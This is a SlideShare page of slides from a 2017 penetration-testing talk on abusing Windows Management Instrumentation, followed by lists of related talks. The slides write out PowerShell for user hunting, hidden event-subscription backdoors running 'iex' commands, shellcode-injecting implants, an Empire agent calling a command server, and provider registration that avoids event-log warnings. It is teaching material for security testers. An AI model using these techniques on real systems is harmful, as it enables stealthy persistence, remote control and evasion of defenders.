SlideShare une entreprise Scribd logo

WMI for Penetration Testers - Arcticcon 2017

Télécharger en tant que PPTX, PDF
A
Alexander Polce Leary

This document provides an overview of Windows Management Instrumentation (WMI) and techniques for abusing WMI for offensive operations. It begins with introducing the author and includes an outline of topics to be covered. It then defines WMI and compares it to SQL databases. The document discusses useful WMI queries, using WMI for user hunting, creating WMI event subscriptions, duplicating WMI classes, and hiding WMI methods. It also covers storing files in WMI, creating custom WMI providers, and registering WMI providers without triggering event log warnings. In summary, the document outlines various techniques for abusing WMI for offensive purposes such as persistence, fileless execution, and covert command and control.

Technologie
1  sur  40
1 Confidential & Proprietary WHO AM I  Alexander Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
2 Confidential & Proprietary OUTLINE 1. WMI Overview 2. WMI Event Subscriptions 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
3 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
4 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
5 Confidential & Proprietary USEFUL QUERIES StdRegProv Invoke-WmiMethod -Class StdRegProv -Name CreateKey -ArgumentList $HKLM, "$Key$Value" AntiVirusProduct Get-WmiObject -Namespace ROOT/SecurityCenter2 -Class AntiVirusProduct Win32_Directory Get-CimInstance -Query "SELECT * FROM Win32_Directory WHERE Drive = 'C:' AND Path = '’” CIM_DataFile (Get-CimInstance -Query "SELECT * FROM CIM_DataFile WHERE Drive = 'C:' AND Path = ''").Name Win32_Service (Get-WmiObject Win32_Service | ? Name -Eq LogWatcher).StopService()
6 Confidential & Proprietary USER HUNTING (Get-WmiObject Win32_LoggedOnUser -ComputerName $ComputerName).Antecedent | % {$split = $_.split("`""); $username = $split[1]+""+$split[3]; $username} | Get-Unique (Get-CimInstance Win32_LoggedOnUser -ComputerName $ComputerName).Antecedent | Select Domain,Name -Unique Get-WmiObject Win32_LogonSession -ComputerName $ComputerName | %{Get-WmiObject -Query "ASSOCIATORS OF {Win32_LogonSession.LogonId=$($_.LogonId)} WHERE ResultClass=Win32_UserAccount” -ComputerName $ComputerName} Get-WmiObject -Class Win32_Process -ComputerName $ComputerName | %{$_.GetOwner()} | Select domain, user -Unique
7 Confidential & Proprietary7 Confidential & Proprietary WMI EVENT SUBSCRIPTIONS INVOKE-WMIDUPLICATECLASS
8 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
9 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
10 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
11 Confidential & Proprietary
12 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
13 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
14 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace rootsubscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
15 Confidential & Proprietary
16 Confidential & Proprietary16 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
17 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
18 Confidential & Proprietary
19 Confidential & Proprietary19 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
20 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
21 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators  [ManagementEntity]  [ManagementTask]  Remove calls to stdin, stdout, and stderr  PowerShell Command Execution  https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider  ShellCode Runner  https://github.com/subTee/EvilWMIProvider
22 Confidential & Proprietary
23 Confidential & Proprietary WMI BACKDOOR 1. Base64 Encode Payload 2. Store Payload as Base64 Encoded String in WMI 3. Extract as a byte array and then inject the payload  Supported Payloads:  ShellCode, Dll, PE
24 Confidential & Proprietary
25 Confidential & Proprietary
26 Confidential & Proprietary
27 Confidential & Proprietary
28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” || “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
29 Confidential & Proprietary EMPIRE - .NET AGENT
30 Confidential & Proprietary30 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
31 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
32 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
33 Confidential & Proprietary
34 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
35 Confidential & Proprietary MANUAL REGISTRATION That looks hard
36 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
37 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
38 Confidential & Proprietary
39 Confidential & Proprietary  Applications and Service Logs / Microsoft / Windows / WMI Activity https://msdn.microsoft.com/en-us/library/aa826686(v=vs.85).aspx
40 Confidential & Proprietary Questions?

Recommandé

Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
Alexander Polce Leary
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
Will Schroeder
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
EnclaveSecurity
 

Recommandé

Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
Alexander Polce Leary
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
Will Schroeder
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
EnclaveSecurity
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
Benjamin Delpy
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
Will Schroeder
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
Denis Gundarev
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
nettitude_labs
 
1000 to 0
1000 to 01000 to 0
1000 to 0
Sunny Neo
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
Sunny Neo
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
enigma0x3
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
Will Schroeder
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
Nikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Chris Gates
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat Security Conference
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 

Contenu connexe

Tendances

Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
Denis Gundarev
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat Security Conference
 

Tendances (20)

BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 

En vedette

Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
Chris Thompson
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
Symantec Security Response
 
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
PacSecJP
 

En vedette (16)

Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
 
Catching fileless attacks
Catching fileless attacksCatching fileless attacks
Catching fileless attacks
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
 

Similaire à WMI for Penetration Testers - Arcticcon 2017

Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
OW2
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
Scott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Scott Sutherland
 
DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...
DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...
DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...
DevDay Dresden
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Scott Sutherland
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-V
Lai Yoong Seng
 
Serverless security: defense against the dark arts
Serverless security: defense against the dark artsServerless security: defense against the dark arts
Serverless security: defense against the dark arts
Yan Cui
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
Rob Ragan
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
CODE BLUE
 
WMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARESWMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARES
Santhosh Kumar
 

Similaire à WMI for Penetration Testers - Arcticcon 2017 (20)

2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools
 
Advanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMIAdvanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMI
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerBeyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...
DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...
DevDay 2017: Christof Fetzer - SCONE: Secure Linux Container Environments wit...
 
